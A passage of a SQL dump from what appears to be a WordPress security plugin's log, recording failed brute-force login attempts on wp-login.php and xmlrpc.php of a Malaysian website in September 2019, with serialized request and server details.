14:00:44',18256136,19554944,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.151.61'),(24577,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.151.61\";s:11:\"REMOTE_PORT\";s:5:\"38330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDnA@XYZLg4KrmIkGgZcAAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568728836.0236\";s:12:\"REQUEST_TIME\";s:10:\"1568728836\";}}','notice','2019-09-17 14:00:37','2019-09-17 14:00:36',17739368,19232264,'https://bintara.com.my/wp-login.php',1,0,'157.230.151.61'),(24576,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"37698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDkNV33ObIZHOz3-1bhlgAAAQA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568728117.3323\";s:12:\"REQUEST_TIME\";s:10:\"1568728117\";}}','notice','2019-09-17 13:48:38','2019-09-17 13:48:37',18257616,19555072,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.80.77'),(24575,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"37362\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDkM5W0dSdzA5Y@GlAPXAAAAg4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568728115.211\";s:12:\"REQUEST_TIME\";s:10:\"1568728115\";}}','notice','2019-09-17 13:48:36','2019-09-17 13:48:35',17739696,19230488,'https://bintara.com.my/wp-login.php',1,0,'128.199.80.77'),(24574,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.241.37.134\";s:11:\"REMOTE_PORT\";s:5:\"42440\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDjCld3b0tfDgYOg7gFkwAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568727818.542\";s:12:\"REQUEST_TIME\";s:10:\"1568727818\";}}','notice','2019-09-17 13:43:40','2019-09-17 13:43:38',18257048,19554280,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.37.134'),(24573,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.241.37.134\";s:11:\"REMOTE_PORT\";s:5:\"41604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDjBpS9022wVwVSW96aKAAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568727815.0087\";s:12:\"REQUEST_TIME\";s:10:\"1568727815\";}}','notice','2019-09-17 13:43:36','2019-09-17 13:43:35',17739408,19230144,'https://bintara.com.my/wp-login.php',1,0,'162.241.37.134'),(24572,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.159.210.58\";s:11:\"REMOTE_PORT\";s:5:\"52698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDhF7Ip53uPsY7BKAryjwAAAFI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568727319.3549\";s:12:\"REQUEST_TIME\";s:10:\"1568727319\";}}','notice','2019-09-17 13:35:20','2019-09-17 13:35:19',18256240,19556736,'https://bintara.com.my/xmlrpc.php',1,0,'213.159.210.58'),(24571,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.159.210.58\";s:11:\"REMOTE_PORT\";s:5:\"51914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDhFJS9022wVwVSW96ZPgAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568727316.4649\";s:12:\"REQUEST_TIME\";s:10:\"1568727316\";}}','notice','2019-09-17 13:35:17','2019-09-17 13:35:16',17740184,19231176,'https://bintara.com.my/wp-login.php',1,0,'213.159.210.58'),(24570,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"47354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDg0Q99C9j9bhK9KplhVwAAAQA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568727249.6221\";s:12:\"REQUEST_TIME\";s:10:\"1568727249\";}}','notice','2019-09-17 13:34:11','2019-09-17 13:34:10',18256736,19556520,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(24569,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"46808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDgzpS9022wVwVSW96ZNwAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568727246.8161\";s:12:\"REQUEST_TIME\";s:10:\"1568727246\";}}','notice','2019-09-17 13:34:08','2019-09-17 